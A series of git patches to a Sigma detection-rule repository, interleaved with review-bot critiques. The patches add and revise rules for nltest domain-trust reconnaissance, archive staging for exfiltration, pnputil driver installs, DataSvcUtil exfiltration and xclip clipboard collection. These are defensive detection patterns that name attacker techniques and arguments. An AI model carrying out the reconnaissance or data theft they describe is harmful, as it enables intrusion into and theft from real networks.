From 17ad95cd12a43605165d0819b2b2addef64ef818 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Wed, 29 Sep 2021 10:58:00 +0200 Subject: [PATCH 1136/1367] Update sysmon_delete_prefetch.yml --- rules/windows/file_delete/sysmon_delete_prefetch.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_delete/sysmon_delete_prefetch.yml b/rules/windows/file_delete/sysmon_delete_prefetch.yml index be238a8f..45197194 100755 --- a/rules/windows/file_delete/sysmon_delete_prefetch.yml +++ b/rules/windows/file_delete/sysmon_delete_prefetch.yml @@ -1,4 +1,4 @@ -title: Prefetch file deletion +title: Prefetch File Deletion id: 0a1f9d29-6465-4776-b091-7f43b26e4c89 status: experimental description: Detects the deletion of a prefetch file (AntiForensic) From 2ae2c35a7fd72718339c01028037d134aadd79d9 Mon Sep 17 00:00:00 2001 From: "neonprimetime security (Justin C Miller)" Date: Wed, 29 Sep 2021 07:47:12 -0500 Subject: [PATCH 1137/1367] mispelled 'mshta.exe' in selection_base it said 'mhsta.exe' and it should say 'mshta.exe' --- rules/windows/process_creation/win_susp_mshta_pattern.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_mshta_pattern.yml b/rules/windows/process_creation/win_susp_mshta_pattern.yml index d9e7e010..8291ef09 100644 --- a/rules/windows/process_creation/win_susp_mshta_pattern.yml +++ b/rules/windows/process_creation/win_susp_mshta_pattern.yml @@ -16,7 +16,7 @@ logsource: detection: # Binary Selector selection_base: - Image|endswith: '\mhsta.exe' + Image|endswith: '\mshta.exe' # Suspicious parents selection1: ParentImage|endswith: From 056067086c1428e3ab6962ef1611270dbc72fb73 Mon Sep 17 00:00:00 2001 
From: webboy2015 Date: Wed, 29 Sep 2021 14:33:36 -0700 Subject: [PATCH 1138/1367] Create win_lolbas_execution_of_nltest.exe.yaml The attacker might use LOLBAS nltest.exe for the discovery of domain controllers, domain trusts, parent domain, and the current user permissions. This event can be detected in the Windows Security Log by looking for event id 4689 indicating that nltest.exe was executed and has exited with the execution result of "0x0". --- .../win_lolbas_execution_of_nltest.exe | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/windows/process_creation/win_lolbas_execution_of_nltest.exe diff --git a/rules/windows/process_creation/win_lolbas_execution_of_nltest.exe b/rules/windows/process_creation/win_lolbas_execution_of_nltest.exe new file mode 100644 index 00000000..11563746 --- /dev/null +++ b/rules/windows/process_creation/win_lolbas_execution_of_nltest.exe @@ -0,0 +1,28 @@ +title: windows lolbas execution of nltest.exe +id: eeb66bbb-3dde-4582-815a-584aee9fe6d1 # https://www.uuidgenerator.net/version4 +status: experimental +author: Arun Chauhan +date: 2021/08/24 +description: The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions. +references: + - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm + - https://attack.mitre.org/software/S0359/ +tags: + - attack.discovery + - attack.t1482 # enumerate trusted domains by using commands such as nltest /domain_trusts + - attack.t1018 # enumerate remote domain controllers using options such as /dclist and /dsgetdc + - attack.1016 # enumerate the parent domain of a local machine using /parentdomain +logsource: + product: windows + service: security +detection: + selection: + EventID: 4689 + Image|contains: "nltest.exe" + ExitStatus: "0x0" + condition: selection +fields: + - "SubjectUserName" +falsepositives: + - "Red team activity" +level: high 
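Review bot: The file is created as `rules/windows/process_creation/win_lolbas_execution_of_nltest.exe` with no `.yml` extension, so loaders and tests that glob for `*.yml` skip it silently; it should be `win_lolbas_execution_of_nltest.yml`. Inside the rule `attack.1016` is not a valid tag (`attack.t1016`), and `level: high` for any successful nltest exit conflicts with the existing `win_nltest_recon.yml` earlier in this series, which only fires on specific recon parameters - nltest runs legitimately on every domain-joined admin workstation, so `medium` or `low` with `falsepositives` naming administrative use is more defensible. The selection also uses `Image` and `ExitStatus` against Security event 4689, whose schema, as far as I recall, carries the binary path in `ProcessName` and the exit code in `Status`; verify against a sample event, because a mismatch here means the rule never matches after field mapping.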
From 29d66a965cd91e60142f720bb83e51a48610f457 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 30 Sep 2021 10:03:11 +0200 Subject: [PATCH 1139/1367] add 4104 --- .../powershell/powershell_susp_zip_compress.yml | 15 +++++++++++---- 1 file changed, 11 insertions(+), 4 deletions(-) diff --git a/rules/windows/powershell/powershell_susp_zip_compress.yml b/rules/windows/powershell/powershell_susp_zip_compress.yml index be6c466f..98f882e4 100644 --- a/rules/windows/powershell/powershell_susp_zip_compress.yml +++ b/rules/windows/powershell/powershell_susp_zip_compress.yml @@ -3,7 +3,7 @@ id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 status: experimental author: frack113 date: 2021/07/20 -modified: 2021/09/07 +modified: 2021/09/30 description: Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md @@ -13,16 +13,23 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: 4103 Module Logging must be enabled , 4104 Script Block Logging must be enable detection: - selection: + selection_4103: EventID: 4103 ContextInfo|contains|all: - 'Compress-Archive ' - ' -Path ' - ' -DestinationPath ' - '$env:TEMP\' - condition: selection + selection_4104: + EventID: 4104 + ScriptBlockText|contains|all: + - 'Compress-Archive ' + - ' -Path ' + - ' -DestinationPath ' + - '$env:TEMP\' + condition: selection_4103 or selection_4104 falsepositives: - Unknown level: medium From 67818f125aad1ca9fdbb4c748d537e7c0c58a43f Mon Sep 17 00:00:00 2001 From: hazedav Date: Thu, 30 Sep 2021 09:27:18 -0500 Subject: [PATCH 1140/1367] fix(backend): add remediation for lacework policy --- tools/sigma/backends/lacework.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/backends/lacework.py b/tools/sigma/backends/lacework.py index 41433534..29cc3ea7 100644 
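Review bot: The rewritten `definition:` line in the second hunk reads `4103 Module Logging must be enabled , 4104 Script Block Logging must be enable` - stray space before the comma and a missing `d`; `definition: 4103 Module Logging must be enabled, 4104 Script Block Logging must be enabled` is what deployers will copy into their documentation. The four `contains|all` strings are now duplicated verbatim between `selection_4103` and `selection_4104`, which Sigma cannot avoid, but a `# keep both selections in sync` comment above them would stop the two lists from drifting on the next edit.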
--- a/tools/sigma/backends/lacework.py
+++ b/tools/sigma/backends/lacework.py
@@ -554,7 +554,7 @@ class LaceworkPolicy:
 self.description = safe_get(rule, 'description', str)
 # 14. Get Remediation
- self.remediation = ""
+ self.remediation = 'Remediation steps are not represented in Sigma rule specification'
 def __iter__(self):
 for key, attr in {
From 82ba266a53e4df0498d8a6cef5346be2ef729419 Mon Sep 17 00:00:00 2001
From: Andreas Hunkeler
Date: Thu, 30 Sep 2021 16:38:39 +0200
Subject: [PATCH 1141/1367] Add fp note to powershell winapi rule
---
 rules/windows/powershell/powershell_accessing_win_api.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/windows/powershell/powershell_accessing_win_api.yml b/rules/windows/powershell/powershell_accessing_win_api.yml
index f7ed287e..4599517b 100644
--- a/rules/windows/powershell/powershell_accessing_win_api.yml
+++ b/rules/windows/powershell/powershell_accessing_win_api.yml
@@ -68,5 +68,5 @@ detection:
 - 'secur32'
 condition: selection
 falsepositives:
- - Unknown
+ - Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon)
 level: high
From 76224b0fb2d23a24212bb162318cf04833bb76cd Mon Sep 17 00:00:00 2001
From: zaicurity <59199225+zaicurity@users.noreply.github.com>
Date: Thu, 30 Sep 2021 18:12:19 +0200
Subject: [PATCH 1142/1367] Added alternative nltest command parameter
Same as recent change to "Recon Activity with NLTEST" (see commit a2418e4d2cadeefa3b6a7bb639a92ff0872b89ca) Added the command parameter '/trusted_domains' for nltest which can be used as an alternative to '/domain_trusts' to bypass detection. Tested on Windows 10.0.19042 Reference: https://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/
---
 rules/windows/process_creation/win_trust_discovery.yml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/rules/windows/process_creation/win_trust_discovery.yml b/rules/windows/process_creation/win_trust_discovery.yml
index 9ff5c557..e68aa17f 100644
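Review bot: The new placeholder is a bare string literal assigned inside the method; a module-level constant such as `DEFAULT_REMEDIATION = 'Remediation steps are not represented in Sigma rule specification'` with `self.remediation = DEFAULT_REMEDIATION` makes it discoverable and keeps step `# 14. Get Remediation` in the same shape as the neighbouring `safe_get(rule, 'description', str)` lookups. If the policy consumer shows this field to operators as free text, the wording should make clear that it is a generated default rather than guidance, e.g. `'Remediation steps are not represented in the Sigma rule specification; consult the rule references'` - hedged, since the consumer is not visible here. The enclosing method starts before this hunk.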
--- a/rules/windows/process_creation/win_trust_discovery.yml
+++ b/rules/windows/process_creation/win_trust_discovery.yml
@@ -25,6 +25,7 @@ detection:
 CommandLine|contains:
 - 'domain_trusts'
 - 'all_trusts'
+ - '/trusted_domains'
 - '/dclist'
 selection_dsquery_v1:
 Image|endswith: '\dsquery.exe'
From e90094576149b8c04447ecaebed43f3e991a63d9 Mon Sep 17 00:00:00 2001
From: frack113 <62423083+frack113@users.noreply.github.com>
Date: Thu, 30 Sep 2021 19:26:14 +0200
Subject: [PATCH 1143/1367] Update win_trust_discovery.yml
---
 rules/windows/process_creation/win_trust_discovery.yml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/rules/windows/process_creation/win_trust_discovery.yml b/rules/windows/process_creation/win_trust_discovery.yml
index e68aa17f..7d3009e7 100644
--- a/rules/windows/process_creation/win_trust_discovery.yml
+++ b/rules/windows/process_creation/win_trust_discovery.yml
@@ -13,6 +13,7 @@ references:
 - https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html
 - https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/
 - https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/
+ - https://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/
 tags:
 - attack.discovery
 - attack.t1482
From b0b95ce32b0808e3a356b6e5fc5666ed841c046b Mon Sep 17 00:00:00 2001
From: Tareq Alkhatib
Date: Thu, 30 Sep 2021 16:34:14 -0400
Subject: [PATCH 1144/1367] Corrected Technique
---
 .../windows/process_creation/process_mailboxexport_share.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/rules/windows/process_creation/process_mailboxexport_share.yml b/rules/windows/process_creation/process_mailboxexport_share.yml
index d0d62110..4d08c42c 100644
--- a/rules/windows/process_creation/process_mailboxexport_share.yml
+++ b/rules/windows/process_creation/process_mailboxexport_share.yml
@@ -25,5 +25,5 @@ fields: - CommandLine - ParentCommandLine tags: - - attack.collection - - attack.t1114 \ No newline at end of file + - attack.persistence + - attack.t1505.003 \ No newline at end of file From 00513ff2c515ae0bed40a7ac4306c6a169e841df Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 30 Sep 2021 18:47:15 -0500 Subject: [PATCH 1145/1367] Create macos_suspicious_macos_firmware_activity.yml --- ...cos_suspicious_macos_firmware_activity.yml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 rules/linux/macos_suspicious_macos_firmware_activity.yml diff --git a/rules/linux/macos_suspicious_macos_firmware_activity.yml b/rules/linux/macos_suspicious_macos_firmware_activity.yml new file mode 100644 index 00000000..cc89eebf --- /dev/null +++ b/rules/linux/macos_suspicious_macos_firmware_activity.yml @@ -0,0 +1,27 @@ +title: Suspicious MacOS Firmware Activity +id: 7ed2c9f7-c59d-4c82-a7e2-f859aa676099 +status: experimental +description: Detects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers. +author: Austin Songer @austinsonger +date: 2021/09/30 +references: + - https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml + - https://www.manpagez.com/man/8/firmwarepasswd/ + - https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web +logsource: + category: process_creation + product: macos +detection: + selection1: + Image: '/usr/sbin/firmwarepasswd' + CommandLine|contains: + - 'setpasswd' + - 'full' + - 'delete' + - 'check' + condition: selection1 +falsepositives: + - Legitimate administration activities +level: medium +tags: + - attack.impact From 3d7f96ddd7c3809df21b89d62b907f34a43e9a77 Mon Sep 17 00:00:00 2001 
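Review bot: `check` in the `CommandLine|contains` list of the firmwarepasswd rule matches `firmwarepasswd -check`, which only reports whether a firmware password is set and changes nothing, so a medium alert is raised on a read-only query that compliance baselines such as the referenced macos_security project presumably run on a schedule (`-verify` is equally benign and not listed). Restricting the list to the mutating verbs (`setpasswd`, `delete`, `full`) and adding a concrete technique under `attack.impact` (only the tactic is tagged) would make the alert actionable. The description also has `Firmward` for `Firmware` and `manipulates with` for `manipulates`, and the file lives under `rules/linux/` although `product: macos` is declared - check where the repository keeps its other macOS rules before merging.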
From: Austin Songer Date: Thu, 30 Sep 2021 19:14:34 -0500 Subject: [PATCH 1146/1367] Create process_creationprocess_creation_lolbins_suspicious_driver_installed_by_pnputil.yml --- ...suspicious_driver_installed_by_pnputil.yml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 rules/windows/process_creationprocess_creation_lolbins_suspicious_driver_installed_by_pnputil.yml diff --git a/rules/windows/process_creationprocess_creation_lolbins_suspicious_driver_installed_by_pnputil.yml b/rules/windows/process_creationprocess_creation_lolbins_suspicious_driver_installed_by_pnputil.yml new file mode 100644 index 00000000..e7a5f636 --- /dev/null +++ b/rules/windows/process_creationprocess_creation_lolbins_suspicious_driver_installed_by_pnputil.yml @@ -0,0 +1,35 @@ +title: Suspicious Driver Install by pnputil.exe +status: experimental +id: a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1 +author: @LuxNoBulIshit, @aloneliassaf, Austin Songer @austinsonger +date: 2021/09/30 +description: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin +references: + - https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax + - https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html +tags: + - attack.persistence + - attack.t1547 + - attack.t1547.006 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains: + - '-i' + - '-a' + - '-e' + - '.inf' + Image|endswith: + - '\pnputil.exe' + condition: selection +fields: + - ComputerName + - User + - CommandLine + - ParentCommandLine +falsepositives: + - System administrator Usage + - Penetration test +level: medium From 18d65387b5f888d372d39d14487c2427eedb4d59 Mon Sep 17 00:00:00 2001 
From: Austin Songer Date: Thu, 30 Sep 2021 19:15:03 -0500 Subject: [PATCH 1147/1367] Create process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml --- ...suspicious_driver_installed_by_pnputil.yml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml diff --git a/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml b/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml new file mode 100644 index 00000000..e7a5f636 --- /dev/null +++ b/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml @@ -0,0 +1,35 @@ +title: Suspicious Driver Install by pnputil.exe +status: experimental +id: a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1 +author: @LuxNoBulIshit, @aloneliassaf, Austin Songer @austinsonger +date: 2021/09/30 +description: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin +references: + - https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax + - https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html +tags: + - attack.persistence + - attack.t1547 + - attack.t1547.006 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains: + - '-i' + - '-a' + - '-e' + - '.inf' + Image|endswith: + - '\pnputil.exe' + condition: selection +fields: + - ComputerName + - User + - CommandLine + - ParentCommandLine +falsepositives: + - System administrator Usage + - Penetration test +level: medium From 7f0ad710fdf41e357d4ed3cc47c2fca5d7b454cb Mon Sep 17 00:00:00 2001 
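Review bot: A list under `CommandLine|contains` is OR-linked in Sigma, so `'-i'`, `'-a'`, `'-e'` and `'.inf'` are alternatives, and because the first three are two-character substrings almost any `pnputil.exe` invocation (including a plain `/enum-drivers` on an administrator's console) satisfies `selection`; the "driver install" intent of the title needs `contains|all` with install-specific tokens, or a regex such as `CommandLine|re: '(-i|-a|/add-driver|/install)'` where the backend supports it. The referenced Microsoft syntax page documents the slash form (`/add-driver`, `/install`), which this rule does not match at all, so coverage is one-sided (`'-e'` is dropped two commits later, which does not change the substring problem). The identical file body committed on the preceding hunk under the `process_creationprocess_creation_...` path is deleted again two commits later, so only this copy needs the fix.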
From: Austin Songer Date: Thu, 30 Sep 2021 19:15:40 -0500 Subject: [PATCH 1148/1367] Delete process_creationprocess_creation_lolbins_suspicious_driver_installed_by_pnputil.yml --- ...suspicious_driver_installed_by_pnputil.yml | 35 ------------------- 1 file changed, 35 deletions(-) delete mode 100644 rules/windows/process_creationprocess_creation_lolbins_suspicious_driver_installed_by_pnputil.yml diff --git a/rules/windows/process_creationprocess_creation_lolbins_suspicious_driver_installed_by_pnputil.yml b/rules/windows/process_creationprocess_creation_lolbins_suspicious_driver_installed_by_pnputil.yml deleted file mode 100644 index e7a5f636..00000000 --- a/rules/windows/process_creationprocess_creation_lolbins_suspicious_driver_installed_by_pnputil.yml +++ /dev/null @@ -1,35 +0,0 @@ -title: Suspicious Driver Install by pnputil.exe -status: experimental -id: a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1 -author: @LuxNoBulIshit, @aloneliassaf, Austin Songer @austinsonger -date: 2021/09/30 -description: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin -references: - - https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax - - https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html -tags: - - attack.persistence - - attack.t1547 - - attack.t1547.006 -logsource: - category: process_creation - product: windows -detection: - selection: - CommandLine|contains: - - '-i' - - '-a' - - '-e' - - '.inf' - Image|endswith: - - '\pnputil.exe' - condition: selection -fields: - - ComputerName - - User - - CommandLine - - ParentCommandLine -falsepositives: - - System administrator Usage - - Penetration test -level: medium From b14d9e38266044cdb1c8d00c202bd7ff79c07086 Mon Sep 17 00:00:00 2001 
From: Austin Songer Date: Thu, 30 Sep 2021 19:16:02 -0500 Subject: [PATCH 1149/1367] Update process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml --- ...s_creation_lolbins_suspicious_driver_installed_by_pnputil.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml b/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml index e7a5f636..b7c209c0 100644 --- a/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml +++ b/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml @@ -19,7 +19,6 @@ detection: CommandLine|contains: - '-i' - '-a' - - '-e' - '.inf' Image|endswith: - '\pnputil.exe' From e274df1b13a35750af11950170ad6de16ba10636 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 30 Sep 2021 19:18:38 -0500 Subject: [PATCH 1150/1367] Update process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml --- ...ation_lolbins_suspicious_driver_installed_by_pnputil.yml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml b/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml index b7c209c0..a21b20c6 100644 --- a/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml +++ b/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml 
@@ -29,6 +29,8 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - System administrator Usage - - Penetration test + - Pnputil.exe being used may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Penetration Testing level: medium From d55ffe721e7b8369f416d6a848f6e1480044c683 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 30 Sep 2021 19:19:18 -0500 Subject: [PATCH 1151/1367] Update process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml --- ..._creation_lolbins_suspicious_driver_installed_by_pnputil.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml b/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml index a21b20c6..1072fdb3 100644 --- a/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml +++ b/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml @@ -1,7 +1,7 @@ title: Suspicious Driver Install by pnputil.exe status: experimental id: a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1 -author: @LuxNoBulIshit, @aloneliassaf, Austin Songer @austinsonger +author: Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger date: 2021/09/30 description: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin references: From 04acba9c77761b61b60093ee032f1bc9431671a8 Mon Sep 17 00:00:00 2001 
From: Austin Songer Date: Thu, 30 Sep 2021 19:58:21 -0500 Subject: [PATCH 1152/1367] Create process_creation_lolbas_data_exfiltration_by_using_datasvcutil.yml --- ...data_exfiltration_by_using_datasvcutil.yml | 36 +++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 rules/windows/process_creation/process_creation_lolbas_data_exfiltration_by_using_datasvcutil.yml diff --git a/rules/windows/process_creation/process_creation_lolbas_data_exfiltration_by_using_datasvcutil.yml b/rules/windows/process_creation/process_creation_lolbas_data_exfiltration_by_using_datasvcutil.yml new file mode 100644 index 00000000..71febbac --- /dev/null +++ b/rules/windows/process_creation/process_creation_lolbas_data_exfiltration_by_using_datasvcutil.yml 
@@ -0,0 +1,36 @@ +title: LOLBAS Data Exfiltration by DataSvcUtil.exe +id: e290b10b-1023-4452-a4a9-eb31a9013b3a +status: experimental +author: Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger +date: 2021/09/30 +description: Detects when a user performs data exfiltration by using DataSvcUtil.exe +references: + - https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6 + - https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe + - https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services + - https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services +tags: + - attack.exfiltration + - attack.t1567 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains|all: + - '/in:*' + - '/out:*' + Image|endswith: + - '\DataSvcUtil.exe' + condition: selection +fields: + - ComputerName + - User + - CommandLine + - ParentCommandLine +falsepositives: + - DataSvcUtil.exe being used may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Penetration Testing +level: medium From 0d22601112a0680330c5ad61928440d683128a62 Mon Sep 17 00:00:00 2001 From: Tareq Alkhatib Date: Fri, 1 Oct 2021 08:40:59 -0400 Subject: [PATCH 1153/1367] Added Compromise Infrastructure: Web Services technique --- .../windows/process_creation/process_mailboxexport_share.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/process_mailboxexport_share.yml b/rules/windows/process_creation/process_mailboxexport_share.yml index 4d08c42c..afcf7471 100644 
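Review bot: The `description` claims the rule "Detects when a user performs data exfiltration", but the selection only requires DataSvcUtil.exe to run with `/in:` and `/out:`, which are the tool's ordinary arguments for generating a client library, so every legitimate invocation matches and nothing in the rule separates exfiltration from normal use. The description should say what is actually matched and what the analyst has to check, e.g. `description: Detects execution of DataSvcUtil.exe with /in: and /out: arguments; the referenced LOLBAS write-up documents this as a possible exfiltration channel, so review the target given to /in:`. The `falsepositives` entry "Penetration Testing" is fine, but the entry about "user agent" is copied from a web rule and does not apply to a process_creation source.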
--- a/rules/windows/process_creation/process_mailboxexport_share.yml +++ b/rules/windows/process_creation/process_mailboxexport_share.yml @@ -26,4 +26,6 @@ fields: - ParentCommandLine tags: - attack.persistence - - attack.t1505.003 \ No newline at end of file + - attack.t1505.003 + - attack.resource_development + - attack.t1584.006 \ No newline at end of file From e67770d7ea961514c6eef13c1f887049b9e1de5b Mon Sep 17 00:00:00 2001 From: Pawel Mazur Date: Fri, 1 Oct 2021 18:43:03 +0200 Subject: [PATCH 1154/1367] New Rule - Linux - Auditd - Clipboard Collection of Image Data with Xclip Tool --- .../lnx_auditd_clipboard_image_collection.yml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml diff --git a/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml b/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml new file mode 100644 index 00000000..d9ec837b --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml @@ -0,0 +1,32 @@ +title: Clipboard Collection of Image Data with Xclip Tool +id: f200dc3f-b219-425d-a17e-c38467364816 +description: Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. +author: 'Pawel Mazur' +status: experimental +date: 2021/10/01 +references: + - https://attack.mitre.org/techniques/T1115/ + - https://linux.die.net/man/1/xclip +logsources: + product: linux + service: auditd +detection: + xclip: + type: EXECVE + a0: xclip + a1: + - '-selection' + - '-sel' + a2: + - clipboard + - clip + a3: '-t' + a4: 'image/png' + a5: '-o' + condition: xclip +tags: + - attack.collection + - attack.t1115 +falsepositives: + - Legitimate usage of xclip tools +level: low \ No newline at end of file 
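Review bot: The new tags `attack.resource_development` / `attack.t1584.006` (Compromise Infrastructure: Web Services) describe an adversary acquiring third-party web services as attack infrastructure, which does not obviously fit a rule that, judging by its name, fires on a mailbox export to a share; the existing `attack.t1505.003` (web shell) already covers the persistence angle. If the intent is to capture the export being staged, a collection or exfiltration technique would be a closer match; otherwise I would drop the two new tags rather than mis-map the rule. The rest of the rule file is outside the hunk, so this is inferred from the name and the existing tag only.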
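Review bot: The selection pins every argument to a fixed position (`a0` through `a5`), so the rule only matches xclip invocations that use exactly this option order and count; the same command with the options in a different order, or with one extra option inserted, shifts the `aN` fields and is not matched. If that narrowness is intended it should be stated in the description, e.g. `description: ... Only the argument order "-selection clipboard -t image/<type> -o" is matched; other orderings are not covered.`; otherwise the key values (`-o`, the `image/` MIME prefix) should be matched across argument fields rather than at one index. xclip also accepts abbreviated option names beyond the two listed under `a1`, as far as I recall, which the fixed list does not cover.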
From d40b42fc2ce09799fc0dd739b8a0ad2728a25dcf Mon Sep 17 00:00:00 2001 From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Fri, 1 Oct 2021 18:54:12 +0200 Subject: [PATCH 1155/1367] Update lnx_auditd_clipboard_image_collection.yml fixing a typo --- rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml b/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml index d9ec837b..67906351 100644 --- a/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml +++ b/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml @@ -7,7 +7,7 @@ date: 2021/10/01 references: - https://attack.mitre.org/techniques/T1115/ - https://linux.die.net/man/1/xclip -logsources: +logsource: product: linux service: auditd detection: @@ -29,4 +29,4 @@ tags: - attack.t1115 falsepositives: - Legitimate usage of xclip tools -level: low \ No newline at end of file +level: low From 87df79302d58f605104841c477254f534a4de28b Mon Sep 17 00:00:00 2001 From: webboy2015 Date: Fri, 1 Oct 2021 12:55:37 -0700 Subject: [PATCH 1156/1367] Update win_lolbas_execution_of_nltest.exe Changed condition as follows: detection: selection: EventID: 4689 ProcessName|endswith: nltest.exe Status: "0x0" condition: selection Included field - SubjectDomainName --- .../process_creation/win_lolbas_execution_of_nltest.exe | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/win_lolbas_execution_of_nltest.exe b/rules/windows/process_creation/win_lolbas_execution_of_nltest.exe index 11563746..e36bff3e 100644 --- a/rules/windows/process_creation/win_lolbas_execution_of_nltest.exe +++ b/rules/windows/process_creation/win_lolbas_execution_of_nltest.exe 
